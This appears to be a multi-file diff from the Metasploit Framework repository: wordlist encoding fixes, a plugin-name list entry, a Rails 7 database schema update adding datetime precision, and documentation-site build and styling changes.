@@ -84938,13 +84939,13 @@ voidness
 voids
 voila
 voile
-voilà
+voilà
 voip
 vol
 vol-au-vent
 vol.
 volapuk
-volapük
+volapük
 volar
 volatile
 volatileness
@@ -87786,7 +87787,7 @@ yankton
 yao
 yaobang
 yaounde
-yaoundé
+yaoundé
 yap
 yapped
 yapping
@@ -88383,15 +88384,15 @@ zymurgy
 zyrtec
 zyuganov
 zzz
-zürich
-Ågar
-Ångström
-éclair
-éclairs
-éclat
-élan
-émigré
-émigrés
-épée
-étude
+zürich
+Ågar
+Ångström
+éclair
+éclairs
+éclat
+élan
+émigré
+émigrés
+épée
+étude
 vagrant
@@ -56,3 +56,4 @@ custom-registration-form-builder-with-submission-manager
 woocommerce-abandoned-cart
 elementor
 bookingpress
+paid-memberships-pro
@@ -10,15 +10,14 @@
 #
 # It's strongly recommended that you check this file into your version control system.

-ActiveRecord::Schema.define(version: 2019_05_07_120211) do
-
+ActiveRecord::Schema[7.0].define(version: 2019_05_07_120211) do
  # These are extensions that must be enabled in order to support this database
  enable_extension "plpgsql"

  create_table "api_keys", id: :serial, force: :cascade do |t|
    t.text "token"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "async_callbacks", id: :serial, force: :cascade do |t|
@@ -27,16 +26,16 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "listener_uri"
    t.string "target_host"
    t.string "target_port"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "automatic_exploitation_match_results", id: :serial, force: :cascade do |t|
    t.integer "match_id"
    t.integer "run_id"
    t.string "state", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["match_id"], name: "index_automatic_exploitation_match_results_on_match_id"
    t.index ["run_id"], name: "index_automatic_exploitation_match_results_on_run_id"
  end
@@ -44,8 +43,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  create_table "automatic_exploitation_match_sets", id: :serial, force: :cascade do |t|
    t.integer "workspace_id"
    t.integer "user_id"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["user_id"], name: "index_automatic_exploitation_match_sets_on_user_id"
    t.index ["workspace_id"], name: "index_automatic_exploitation_match_sets_on_workspace_id"
  end
@@ -54,8 +53,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.integer "module_detail_id"
    t.string "state"
    t.integer "nexpose_data_vulnerability_definition_id"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.integer "match_set_id"
    t.string "matchable_type"
    t.integer "matchable_id"
@@ -68,8 +67,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.integer "workspace_id"
    t.integer "user_id"
    t.integer "match_set_id"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["match_set_id"], name: "index_automatic_exploitation_runs_on_match_set_id"
    t.index ["user_id"], name: "index_automatic_exploitation_runs_on_user_id"
    t.index ["workspace_id"], name: "index_automatic_exploitation_runs_on_workspace_id"
@@ -77,11 +76,11 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "clients", id: :serial, force: :cascade do |t|
    t.integer "host_id"
-    t.datetime "created_at"
+    t.datetime "created_at", precision: nil
    t.string "ua_string", limit: 1024, null: false
    t.string "ua_name", limit: 64
    t.string "ua_ver", limit: 32
-    t.datetime "updated_at"
+    t.datetime "updated_at", precision: nil
  end

  create_table "credential_cores_tasks", id: false, force: :cascade do |t|
@@ -96,8 +95,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "creds", id: :serial, force: :cascade do |t|
    t.integer "service_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.string "user", limit: 2048
    t.string "pass", limit: 4096
    t.boolean "active", default: true
@@ -110,9 +109,9 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  create_table "events", id: :serial, force: :cascade do |t|
    t.integer "workspace_id"
    t.integer "host_id"
-    t.datetime "created_at"
+    t.datetime "created_at", precision: nil
    t.string "name"
-    t.datetime "updated_at"
+    t.datetime "updated_at", precision: nil
    t.boolean "critical"
    t.boolean "seen"
    t.string "username"
@@ -123,7 +122,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.integer "host_id"
    t.integer "service_id"
    t.integer "vuln_id"
-    t.datetime "attempted_at"
+    t.datetime "attempted_at", precision: nil
    t.boolean "exploited"
    t.string "fail_reason"
    t.string "username"
@@ -141,8 +140,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "session_uuid", limit: 8
    t.string "name", limit: 2048
    t.string "payload", limit: 2048
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "host_details", id: :serial, force: :cascade do |t|
@@ -157,7 +156,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  end

  create_table "hosts", id: :serial, force: :cascade do |t|
-    t.datetime "created_at"
+    t.datetime "created_at", precision: nil
    t.inet "address", null: false
    t.string "mac"
    t.string "comm"
@@ -169,7 +168,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "os_lang"
    t.string "arch"
    t.integer "workspace_id", null: false
-    t.datetime "updated_at"
+    t.datetime "updated_at", precision: nil
    t.text "purpose"
    t.string "info", limit: 65536
    t.text "comments"
@@ -197,8 +196,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  end

  create_table "listeners", id: :serial, force: :cascade do |t|
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.integer "workspace_id", default: 1, null: false
    t.integer "task_id"
    t.boolean "enabled", default: true
@@ -217,8 +216,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "ltype", limit: 512
    t.string "path", limit: 1024
    t.text "data"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.string "content_type"
    t.text "name"
    t.text "info"
@@ -227,8 +226,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  end

  create_table "macros", id: :serial, force: :cascade do |t|
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.text "owner"
    t.text "name"
    t.text "description"
@@ -243,8 +242,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.integer "public_id"
    t.integer "realm_id"
    t.integer "workspace_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.integer "logins_count", default: 0
    t.index ["origin_type", "origin_id"], name: "index_metasploit_credential_cores_on_origin_type_and_origin_id"
    t.index ["private_id"], name: "index_metasploit_credential_cores_on_private_id"
@@ -264,56 +263,56 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.integer "service_id", null: false
    t.string "access_level"
    t.string "status", null: false
-    t.datetime "last_attempted_at"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "last_attempted_at", precision: nil
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["core_id", "service_id"], name: "index_metasploit_credential_logins_on_core_id_and_service_id", unique: true
    t.index ["service_id", "core_id"], name: "index_metasploit_credential_logins_on_service_id_and_core_id", unique: true
  end

  create_table "metasploit_credential_origin_cracked_passwords", id: :serial, force: :cascade do |t|
    t.integer "metasploit_credential_core_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["metasploit_credential_core_id"], name: "originating_credential_cores"
  end

  create_table "metasploit_credential_origin_imports", id: :serial, force: :cascade do |t|
    t.text "filename", null: false
    t.integer "task_id"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["task_id"], name: "index_metasploit_credential_origin_imports_on_task_id"
  end

  create_table "metasploit_credential_origin_manuals", id: :serial, force: :cascade do |t|
    t.integer "user_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["user_id"], name: "index_metasploit_credential_origin_manuals_on_user_id"
  end

  create_table "metasploit_credential_origin_services", id: :serial, force: :cascade do |t|
    t.integer "service_id", null: false
    t.text "module_full_name", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["service_id", "module_full_name"], name: "unique_metasploit_credential_origin_services", unique: true
  end

  create_table "metasploit_credential_origin_sessions", id: :serial, force: :cascade do |t|
    t.text "post_reference_name", null: false
    t.integer "session_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["session_id", "post_reference_name"], name: "unique_metasploit_credential_origin_sessions", unique: true
  end

  create_table "metasploit_credential_privates", id: :serial, force: :cascade do |t|
    t.string "type", null: false
    t.text "data", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.string "jtr_format"
    t.index "type, decode(md5(data), 'hex'::text)", name: "index_metasploit_credential_privates_on_type_and_data_sshkey", unique: true, where: "((type)::text = 'Metasploit::Credential::SSHKey'::text)"
    t.index ["type", "data"], name: "index_metasploit_credential_privates_on_type_and_data", unique: true, where: "(NOT ((type)::text = 'Metasploit::Credential::SSHKey'::text))"
@@ -321,8 +320,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "metasploit_credential_publics", id: :serial, force: :cascade do |t|
    t.string "username", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.string "type", null: false
    t.index ["username"], name: "index_metasploit_credential_publics_on_username", unique: true
  end
@@ -330,8 +329,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  create_table "metasploit_credential_realms", id: :serial, force: :cascade do |t|
    t.string "key", null: false
    t.string "value", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["key", "value"], name: "index_metasploit_credential_realms_on_key_and_value", unique: true
  end

@@ -361,7 +360,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  end

  create_table "module_details", id: :serial, force: :cascade do |t|
-    t.datetime "mtime"
+    t.datetime "mtime", precision: nil
    t.text "file"
    t.string "mtype"
    t.text "refname"
@@ -371,7 +370,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.text "description"
    t.string "license"
    t.boolean "privileged"
-    t.datetime "disclosure_date"
+    t.datetime "disclosure_date", precision: nil
    t.integer "default_target"
    t.text "default_action"
    t.string "stance"
@@ -402,7 +401,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  end

  create_table "module_runs", id: :serial, force: :cascade do |t|
-    t.datetime "attempted_at"
+    t.datetime "attempted_at", precision: nil
    t.text "fail_detail"
    t.string "fail_reason"
    t.text "module_fullname"
@@ -414,8 +413,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "trackable_type"
    t.integer "user_id"
    t.string "username"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["session_id"], name: "index_module_runs_on_session_id"
    t.index ["user_id"], name: "index_module_runs_on_user_id"
  end
@@ -428,8 +427,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  end

  create_table "nexpose_consoles", id: :serial, force: :cascade do |t|
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.boolean "enabled", default: true
    t.text "owner"
    t.text "address"
@@ -444,12 +443,12 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  end

  create_table "notes", id: :serial, force: :cascade do |t|
-    t.datetime "created_at"
+    t.datetime "created_at", precision: nil
    t.string "ntype", limit: 512
    t.integer "workspace_id", default: 1, null: false
    t.integer "service_id"
    t.integer "host_id"
-    t.datetime "updated_at"
+    t.datetime "updated_at", precision: nil
    t.boolean "critical"
    t.boolean "seen"
    t.text "data"
@@ -471,13 +470,13 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "raw_payload_hash"
    t.string "build_status"
    t.string "build_opts"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "profiles", id: :serial, force: :cascade do |t|
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.boolean "active", default: true
    t.text "name"
    t.text "owner"
@@ -486,9 +485,9 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "refs", id: :serial, force: :cascade do |t|
    t.integer "ref_id"
-    t.datetime "created_at"
+    t.datetime "created_at", precision: nil
    t.string "name", limit: 512
-    t.datetime "updated_at"
+    t.datetime "updated_at", precision: nil
    t.index ["name"], name: "index_refs_on_name"
  end

@@ -497,8 +496,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "created_by"
    t.string "path", limit: 1024
    t.text "name"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "reports", id: :serial, force: :cascade do |t|
@@ -507,9 +506,9 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "rtype"
    t.string "path", limit: 1024
    t.text "options"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
-    t.datetime "downloaded_at"
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
+    t.datetime "downloaded_at", precision: nil
    t.integer "task_id"
    t.string "name", limit: 63
  end
@@ -522,12 +521,12 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "services", id: :serial, force: :cascade do |t|
    t.integer "host_id"
-    t.datetime "created_at"
+    t.datetime "created_at", precision: nil
    t.integer "port", null: false
    t.string "proto", limit: 16, null: false
    t.string "state"
    t.string "name"
-    t.datetime "updated_at"
+    t.datetime "updated_at", precision: nil
    t.text "info"
    t.index ["host_id", "port", "proto"], name: "index_services_on_host_id_and_port_and_proto", unique: true
    t.index ["name"], name: "index_services_on_name"
@@ -543,7 +542,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.binary "output"
    t.string "remote_path"
    t.string "local_path"
-    t.datetime "created_at"
+    t.datetime "created_at", precision: nil
  end

  create_table "sessions", id: :serial, force: :cascade do |t|
@@ -555,11 +554,11 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.integer "port"
    t.string "platform"
    t.text "datastore"
-    t.datetime "opened_at", null: false
-    t.datetime "closed_at"
+    t.datetime "opened_at", precision: nil, null: false
+    t.datetime "closed_at", precision: nil
    t.string "close_reason"
    t.integer "local_id"
-    t.datetime "last_seen"
+    t.datetime "last_seen", precision: nil
    t.integer "module_run_id"
    t.index ["module_run_id"], name: "index_sessions_on_module_run_id"
  end
@@ -571,51 +570,51 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.boolean "report_summary", default: false, null: false
    t.boolean "report_detail", default: false, null: false
    t.boolean "critical", default: false, null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "task_creds", id: :serial, force: :cascade do |t|
    t.integer "task_id", null: false
    t.integer "cred_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "task_hosts", id: :serial, force: :cascade do |t|
    t.integer "task_id", null: false
    t.integer "host_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "task_services", id: :serial, force: :cascade do |t|
    t.integer "task_id", null: false
    t.integer "service_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "task_sessions", id: :serial, force: :cascade do |t|
    t.integer "task_id", null: false
    t.integer "session_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "tasks", id: :serial, force: :cascade do |t|
    t.integer "workspace_id", default: 1, null: false
    t.string "created_by"
    t.string "module"
-    t.datetime "completed_at"
+    t.datetime "completed_at", precision: nil
    t.string "path", limit: 1024
    t.string "info"
    t.string "description"
    t.integer "progress"
    t.text "options"
    t.text "error"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.text "result"
    t.string "module_uuid", limit: 8
    t.binary "settings"
@@ -626,8 +625,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "crypted_password"
    t.string "password_salt"
    t.string "persistence_token"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.string "fullname"
    t.string "email"
    t.string "phone"
@@ -638,7 +637,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "vuln_attempts", id: :serial, force: :cascade do |t|
    t.integer "vuln_id"
-    t.datetime "attempted_at"
+    t.datetime "attempted_at", precision: nil
    t.boolean "exploited"
    t.string "fail_reason"
    t.string "username"
@@ -661,26 +660,26 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "nx_vuln_id"
    t.float "nx_severity"
    t.float "nx_pci_severity"
-    t.datetime "nx_published"
-    t.datetime "nx_added"
-    t.datetime "nx_modified"
+    t.datetime "nx_published", precision: nil
+    t.datetime "nx_added", precision: nil
+    t.datetime "nx_modified", precision: nil
    t.text "nx_tags"
    t.text "nx_vuln_status"
    t.text "nx_proof_key"
    t.string "src"
    t.integer "nx_scan_id"
-    t.datetime "nx_vulnerable_since"
+    t.datetime "nx_vulnerable_since", precision: nil
    t.string "nx_pci_compliance_status"
  end

  create_table "vulns", id: :serial, force: :cascade do |t|
    t.integer "host_id"
    t.integer "service_id"
-    t.datetime "created_at"
+    t.datetime "created_at", precision: nil
    t.string "name"
-    t.datetime "updated_at"
+    t.datetime "updated_at", precision: nil
    t.string "info", limit: 65536
-    t.datetime "exploited_at"
+    t.datetime "exploited_at", precision: nil
    t.integer "vuln_detail_count", default: 0
    t.integer "vuln_attempt_count", default: 0
    t.integer "origin_id"
@@ -696,8 +695,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "web_forms", id: :serial, force: :cascade do |t|
    t.integer "web_site_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.text "path"
    t.string "method", limit: 1024
    t.text "params"
@@ -707,15 +706,15 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "web_pages", id: :serial, force: :cascade do |t|
    t.integer "web_site_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.text "path"
    t.text "query"
    t.integer "code", null: false
    t.text "cookie"
    t.text "auth"
    t.text "ctype"
-    t.datetime "mtime"
+    t.datetime "mtime", precision: nil
    t.text "location"
    t.text "headers"
    t.binary "body"
@@ -726,8 +725,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "web_sites", id: :serial, force: :cascade do |t|
    t.integer "service_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.string "vhost", limit: 2048
    t.text "comments"
    t.text "options"
@@ -738,8 +737,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "web_vulns", id: :serial, force: :cascade do |t|
    t.integer "web_site_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.text "path", null: false
    t.string "method", limit: 1024, null: false
    t.text "params"
@@ -773,8 +772,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "respcode", limit: 16
    t.text "resphead"
    t.text "response"
-    t.datetime "created_at"
-    t.datetime "updated_at"
+    t.datetime "created_at", precision: nil
+    t.datetime "updated_at", precision: nil
  end

  create_table "wmap_targets", id: :serial, force: :cascade do |t|
@@ -783,8 +782,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.integer "port"
    t.integer "ssl"
    t.integer "selected"
-    t.datetime "created_at"
-    t.datetime "updated_at"
+    t.datetime "created_at", precision: nil
+    t.datetime "updated_at", precision: nil
  end

  create_table "workspace_members", id: false, force: :cascade do |t|
@@ -794,8 +793,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "workspaces", id: :serial, force: :cascade do |t|
    t.string "name"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.string "boundary", limit: 4096
    t.string "description", limit: 4096
    t.integer "owner_id"
@@ -7,4 +7,4 @@ vendor
 # These files will be generated by build.rb and do not need to be committed
 docs
 metasploit-framework.wiki.old
-index.md
+/index.md
@@ -13,6 +13,19 @@ How it works:

 Behind the scenes these docs are built and deployed to https://docs.metasploit.com/

+### Adding pages
+
+You can modify existing documentation files within `metasploit-framework.wiki/` with an editor of your choice and send a pull request.
+To add a new page, modify `navigation.rb`. Full details are found beside the `NAVIGATION_CONFIG` constant.
+
+## Adding links
+
+For linking to other docs the Github markdown syntax `[[link text|relative_path_to_docs]]` is used. Behind the scenes these
+links will be verified at build time to ensure there's no 404 links.
+
+Note: It is also possible to use the syntax `[[link text|relative_path_to_docs#section]]` - but this navigation will happen client side, and
+there is no validation that these sections exist at build time. It is possible for future edits to a markdown file to break these links.
+
 ## Setup

 ### Developer build
@@ -42,9 +55,3 @@ bundle exec ruby build.rb --production --serve
 ```

 Now visit http://127.0.0.1:4000/metasploit-framework/
-
-
-### Contributing Documentation
-
-You can modify existing documentation files within `metasploit-framework.wiki/` with an editor of your choice and send a pull request.
-Note that adding a new page will also require modifying `navigation.rb` to appear on the navigation menu.
@@ -41,7 +41,7 @@ aux_links:

 nav_cache: true

-# False until the wiki's markdown files are migrated into the Metasploit repository
+# We set gh_edit_link to false to opt out of the default edit link support - and instead use a custom implementation in _includes/footer_custom.html
 gh_edit_link: false
 gh_edit_link_text: 'Edit this page on GitHub'
 gh_edit_repository: 'https://github.com/rapid7/metasploit-framework'
@@ -0,0 +1,3 @@
+# Staging assumes that it is currently deployed to gh-pages; All links are prefixed with /metasploit-framework
+baseurl: 'metasploit-framework'
+ga_tracking: ''
@@ -0,0 +1,17 @@
+{% comment %}
+Modification of https://github.com/just-the-docs/just-the-docs/blob/2495d3e6bb5720ae23e35caf16888f0c7f37ede0/_includes/components/footer.html
+The 'edit this page' page link now only appears when the root folder entry has content, and also includes linking directly to module documentation,
+or site wiki content
+{% endcomment %}
+
+{% if
+    site.gh_edit_link_text and
+    site.gh_edit_repository and
+    site.gh_edit_branch and
+    site.gh_edit_view_mode and
+    page.has_content == 'true'
+%}
+    <p class="text-small text-grey-dk-000 mb-0">
+        <a href="{{ site.gh_edit_repository }}/{{ site.gh_edit_view_mode }}/{{ site.gh_edit_branch }}{% if site.gh_edit_source %}/{{ site.gh_edit_source }}{% endif %}{% if page.collection and site.collections_dir %}/{{ site.collections_dir }}{% endif %}/{{ page.old_path }}" id="edit-this-page">{{ site.gh_edit_link_text }}</a>
+    </p>
+{% endif %}
@@ -0,0 +1,2 @@
+<link rel="stylesheet" href="{% link assets/css/main.css %}">
+
@@ -0,0 +1,60 @@
+// Handle opening/closing module overview list items
+jtd.onReady(function(ready) {
+    var forEach = function (list, callback) {
+        for (var i = 0; i < list.length; i++) {
+            callback(list[i])
+        }
+    };
+
+    // Bind listeners for expand all / collapse all functionality
+    var bindToggleAll = function (selector, options) {
+        var isOpen = options.open;
+        var expandAllButtons = document.querySelectorAll(selector);
+        forEach(expandAllButtons, function (button) {
+            jtd.addEvent(button, 'click', function (e) {
+                var originalTarget = e.target || e.srcElement || e.originalTarget;
+                if (originalTarget.tagName !== 'A') { return; }
+
+                var moduleList = originalTarget.closest('.module-list');
+                forEach(moduleList.querySelectorAll('.folder > ul'), function (list) {
+                    if (isOpen) {
+                        list.classList.add('open');
+                    } else {
+                        list.classList.remove('open');
+                    }
+                })
+
+                e.preventDefault();
+            });
+        });
+    };
+    bindToggleAll('.module-list [data-expand-all]', { open: true })
+    bindToggleAll('.module-list [data-collapse-all]', { open: false })
+
+    // Bind listeners for collapsing module navigation items
+    var moduleStructureElements = document.querySelectorAll('.module-structure');
+    forEach(moduleStructureElements, function (moduleStructure) {
+        jtd.addEvent(moduleStructure, 'click', function (e) {
+            var originalTarget = e.target || e.srcElement || e.originalTarget;
+            if (originalTarget.tagName !== 'A') { return; }
+
+            var parentListItem = originalTarget.closest('li');
+            if (parentListItem.className.indexOf('folder') === -1) { return; }
+
+            toggleChildModuleList(parentListItem)
+            e.preventDefault();
+        });
+    })
+
+    var toggleChildModuleList = function (parent) {
+        var list = parent.querySelector('ul');
+        if (!list) {
+            return;
+        }
+        list.classList.toggle('open');
+        // Recursively automatically open any nested lists of size 1
+        if (list.children.length === 1) {
+            toggleChildModuleList(list.children[0])
+        }
+    }
+});
@@ -0,0 +1,74 @@
+require 'rouge'
+
+# Custom highlighting support for Metasploit's prompt
+# https://rouge-ruby.github.io/docs/file.LexerDevelopment.html
+module Rouge
+  # Custom tokens specific to Msf, as the inbuilt lexer tokens can't capture
+  # the detail required for Msf's print_warning/print_good/etc calls.
+  module Tokens
+    def self.token(name, shortname, &b)
+      tok = Token.make_token(name, shortname, &b)
+      const_set(name, tok)
+    end
+
+    # The 'shortname' is the class used when generating the HTML. It is intentionally
+    # short to reduce HTML size.
+    # https://github.com/rouge-ruby/rouge/blob/a4ed658d2778a3e2d3e68873f7221b91149a2ed4/lib/rouge/token.rb#L69
+    SHORTNAME = 'z'
+
+    token :Msf, SHORTNAME do
+      # prompt - msf / msf5 / msf6 / meterpreter
+      token :Prompt, "#{SHORTNAME}p"
+      # [-]
+      token :Error, "#{SHORTNAME}e"
+      # [+]
+      token :Good, "#{SHORTNAME}g"
+      # [*]
+      token :Status, "#{SHORTNAME}s"
+      # [!]
+      token :Warning, "#{SHORTNAME}w"
+    end
+  end
+
+  module Lexers
+    class MetasploitConsoleLanguage < Rouge::RegexLexer
+      title 'msf'
+      tag 'msf'
+      desc 'Metasploit console highlighter'
+      filenames []
+      mimetypes []
+
+      def self.keywords
+        @keywords ||= Set.new %w()
+      end
+
+      state :whitespace do
+        rule %r/\s+/, Text
+      end
+
+      state :root do
+        mixin :whitespace
+
+        # Match msf, msf5, msf6, meterpreter
+        rule %r{^(msf\d?|meterpreter)}, Tokens::Msf::Prompt, :msf_prompt
+        rule %r{^\[-\]}, Tokens::Msf::Error
+        rule %r{^\[\+\]}, Tokens::Msf::Good
+        rule %r{^\[\*\]}, Tokens::Msf::Status
+        rule %r{^\[\!\]}, Tokens::Msf::Warning
+        rule %r{.+}, Text
+      end
+
+      # State for highlighting the prompt such as
+      # msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) >
+      state :msf_prompt do
+        mixin :whitespace
+
+        rule %r{exploit|payload|auxiliary|encoder|evasion|post|nop}, Text
+        rule %r{\(}, Punctuation
+        rule %r{\)}, Punctuation
+        rule %r{[\w/]+}, Keyword::Constant
+        rule %r{>}, Punctuation, :pop!
+      end
+    end
+  end
+end
